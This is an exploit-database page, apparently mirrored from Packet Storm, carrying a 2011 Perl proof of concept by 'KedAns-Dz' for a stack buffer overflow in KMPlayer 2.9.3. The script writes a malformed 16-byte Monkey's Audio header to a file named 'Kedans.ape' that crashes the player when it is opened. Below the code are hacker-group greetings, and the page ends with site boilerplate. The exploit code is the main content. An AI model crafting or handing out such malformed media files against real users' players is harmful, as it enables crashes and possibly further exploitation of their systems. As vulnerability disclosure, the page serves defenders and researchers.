Lucene search
K

KMPlayer 2.9.3.1 APE Buffer Overflow

🗓️ 11 Mar 2011 00:00:00Reported by KedAns-DzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 39 Views

KMPlayer 2.9.3 APE Buffer Overflow in Window

Code
`#!/usr/bin/perl  
  
###  
# Title : KMPlayer 2.9.3 (.ape) Stack buffer Overflow  
# Author : KedAns-Dz  
# E-mail : [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Twitter page : twitter.com/kedans  
# platform : Windows   
# Impact : Stack Overflow in 'KMPlayer.exe' Process ,   
# ++ and Blocked in KMP window form !!  
# Tested on : Windows XP SP3 Français   
# Target : KMPlayer 2.9.3.1214  
###  
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )  
# ------------  
# Usage : 1 - Creat APE file  
# => 2 - Open APE file With KMPlayer 2.9  
# => 3 - OverFlow !!!  
# ------------  
#START SYSTEM /root@MSdos/ :  
system("title KedAns-Dz");  
system("color 1e");  
system("cls");  
print "\n\n";   
print " |===========================================================|\n";  
print " |= [!] Name : KMPlayer 2.9.3 (.ape) Monkey's Audio Format =|\n";  
print " |= [!] Exploit : Stack Buffer Overflow =|\n";  
print " |= [!] Author : KedAns-Dz =|\n";  
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";  
print " |===========================================================|\n";  
sleep(2);  
print "\n";  
# Creating ...  
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header  
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB  
print file $PoC;   
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";  
close(file);   
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================  
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >  
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{  
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX   
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,  
# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah   
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,  
# Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,  
# hotturks.org : TeX * KadaVra ... all Others  
# Kelvin.Xgr ( kelvinx.net)  
#===========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Mar 2011 00:00Current
0.7Low risk
Vulners AI Score0.7
39